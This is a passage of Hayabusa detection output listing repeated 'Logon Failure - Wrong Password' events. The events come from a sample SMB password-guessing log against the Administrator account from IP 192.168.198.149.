NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.431 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nvKcLrUXqu2vTKO3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.486 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PLycXLeAU21pdnXL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.527 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SgwjJSKOPnurDWW4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.564 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YPDYdxPoQAl8aGMs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.594 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CX8knunlT6SMpmQw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.632 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: AAjYbt50leZt3Xve | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.677 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3CD0HUCdg4UWOiji | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.709 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dkeWmTE1R1rYaYP8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.744 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W87qcfSj4qWWUv4k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.830 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WUCyUQgbUqwaLj3J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.877 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q9nLhDbcvmVBZp4f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:50:22.925 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BBWo1zDdjaAeGDWW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.960 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vjHRFk2flmzzd1zg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 53HYxs9s7fpP1y6V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.035 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tluqXKvVooP7VNyB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.076 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 43m0nfi5tiv4TpSB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.107 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qjPyJXl984vViV6L | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.143 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MomQ8Yt51VsMiO4p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.175 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LJYCi5r2otMHxA8f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.211 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4oUSkMBI8SGDLwYC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.251 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j1x3lyRjxn73KITB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.283 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gh05BhGpwq1ho62a | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.324 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: bxj6ITbiciyRNLbF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.370 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Uev2mjCaqHjm6NYi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.415 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L4WU383o9E5JyM5V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.450 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lfMv0lsoiRnTCFXe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.504 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XL4ahBqUyGeTONkE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.549 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8hJ888Kmyi6KqIPn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:50:23.596 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VZ6sfYMHuygnMdY2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.636 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XkuSlyTNc5OOoUtd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.676 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5Z13YmupcMato8Sd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.733 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JedeMnLPnRJEwhZ9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.810 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mmy0c0wFheIRzSo4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sskKdqku5S0f1sWm | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.962 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 15Qg0nCXNj7Ub1Sj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.004 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZD6iuaqv70k69G87 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.051 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gk3UuqTJmvH1snmN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.092 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zaw9iF5mJlyygdnB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Sr5PZAd1qMc7hi3c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.167 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: l5xbQtyueVq3fJSG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.203 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g2nP0zz2ofBxTGw6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.237 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SYJheREJmEwj0791 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.277 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: exglD9fnLwaqwRZn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.325 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8bSAU1QjasDAsmry | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.363 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cfnrtXR7evQBbaOw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:50:24.410 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KYAwjW99chcntPsQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.464 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rG2PYfOTfT7QvbPu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.508 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FojDtfDNXq0gQfYu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.549 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SUTT0QycbFtyJfNL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.596 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gcbv1lrcYdT9Wuli | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.636 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pjdFfvCCfGXo7FUf | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.697 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rzqGdWlGglLQx6Z4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.749 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V3Rt80PMk70sVqbk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.795 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: okunzcEHnxUml4SG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.842 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qH0AY3DeIryuHSiN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.886 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DjqtxY5Fly4qAusS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.935 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: PXHYu7wAqo7m6mZn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:24.990 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UaEM3boErBRrCbna | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.040 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7nSzwstH2imPjwah | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.153 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9Z6NM0I4vRTXlLKu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.193 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jYhjN3f8KlFIEUKy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.232 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qWicYt2HXLDgc3kc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:50:25.269 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Uz7yqqxdMrsM2L1g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.308 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wqKTguT2Z3OPCxGR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.352 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ywpwCM4u6nFSq9oS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.407 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k1t5ZBw3HOxux65e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.534 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MtLFQSltjjOjdl2c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.593 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AyFD3cjef0NUMZZ5 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.656 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uDYECnF1YTKRKA3K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.700 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pfqxcIVpX9BbsPIM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.745 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mjL5hvyYesMfDISw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.774 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3bh8c5ohv55SAX26 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.817 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MflfcFDnGU3xUOmz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:25.859 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
